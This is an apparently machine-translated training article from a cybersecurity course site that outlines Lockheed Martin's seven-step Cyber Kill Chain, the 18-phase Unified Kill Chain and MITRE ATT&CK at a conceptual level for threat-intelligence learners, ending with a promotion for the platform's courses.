The Kill Chain concept in cybersecurity

Reading time : 5 min

The concept of "Kill Chain" is again a concept that comes from the military world.

In the world of cyber security, this concept is attached to the field of "Cyber Threat Intelligence" (CTI), which is the field where intelligence about attackers is sought in order to better protect against them.

The "Kill Chain" concept has been implemented in two different repositories, which we will discover in this lesson.

Cyber Kill Chain

The "Cyber Kill Chain" benchmark was published in 2011 by Lockheed Martin. In the "Cyber Kill Chain", a cyber attack is broken down into 7 chronological steps:

Recognition
Weaponization
Delivery
Operation
Installation
Command & Control (Remote control)
Actions on Objectives (Final Goal)

Recognition

In this first phase, the attacker will try to collect as much information as possible about his target.

If technical information will be collected thanks to tools (domain names, IP addresses, etc.), the attacker will also use OpenSource Intelligence (OSINT), to collect publicly available information, for example on social networks or news sites (e-mail addresses, names and functions of employees).

Weaponization

Once the attacker is well informed about his victim, he will be able to put together a suitable arsenal to carry out his plan.

He will have the possibility to choose among existing tools (for example non-malicious tools but which will then be diverted from their initial function), to buy malicious software, or to design his own tools.

Delivery

After the well-prepared arsenal, the attacker will have to find a way to transfer all or part of his weaponry to his victim (payload in English).

To do this, the attacker has several solutions, among the most well-known:

phishing e-mail.
compromise of a supplier (supply chain).
social engineering, for example, dropping a booby-trapped USB key in the company's parking lot (social engineering).

Operation

In this phase, the attacker's payload is executed, and will exploit a vulnerability to gain initial access (foothold) on the target's information system.

Installation

After gaining initial access, the attacker must now work to gain sustained access to the information system.

This means that if he loses the connection (in the event of a system reboot, for example), he should not have to repeat the previous phases to regain his access.

There are several techniques for maintaining access to the target:

Backdoor.
Scheduled task.
Web shell for web servers.
Add a malicious service.

Command & Control (Remote control)

The attacker will now seek to be able to work efficiently, sometimes with limited initial access.

He will therefore use a command and control tool (abbreviated C2 or C&C), which allows him to perform all his operations remotely, from an interface prepared for his attack.

Among the best known Command and Control tools:

Cobalt Strike
Empire
Nighthawk

Actions on Objectives (Final Goal)

The last step for the attacker is of course to achieve his objectives. Having now access to the victim's information system, he will be able to achieve his goal, either indirectly :

Lateralization (lateral movement)
Internal recognition
Privilege escalation

Either directly:

Espionage
Ransom

Unified Kill Chain".

The Unified Kill Chain (abbreviated to UKC) is another kill chain repository tailored to cyber security.

This repository, complementary to the "Cyber Kill Chain," was first published in 2017 and is much more detailed, consisting of 18 phases.

Note that these 18 phases are not all systematically implemented during an attack. They are divided into three main stages, which we will now discuss.

Step "In"

The "In" stage is the initial access stage, and it contains the following phases:

Recognition.
Weaponization.
Social Engineering.
Operation.
Persistence.
Defense Evasion.
Command & Control.

Through" stage

The "Through" stage is the stage where the attacker will take control of the target's information system, the phases are the following:

Pivoting.
Discovery (internal recognition).
Privilege Escalation.
Execution.
Credential Access.
Lateral Movement.

Step "Out

Just like in the last stage of the "Cyber Kill Chian" the attacker now has the necessary access to the victim's information system to achieve his objectives. The last phases of the "Unified Kill Chain" are :

Access.
Collection.
Exfiltration.
Impact.
Objectives.

The MITRE Att&ck benchmark

The MITRE Att&ck repository is a dynamic "Kill Chain", which allows to visualize the tools and techniques used by already known attackers.

A complete course is available on Seela to learn how to use the MITRE Att&ck repository.

Start your cybersecurity training!

Launch your career in cybersecurity and train for the job that fits you. Our online platform allows you to train at your own pace for a quick and efficient increase in skills.

100% online

Theory & Practice

Customized by level

Start your cybersecurity training

Training

Career

Cybersecurity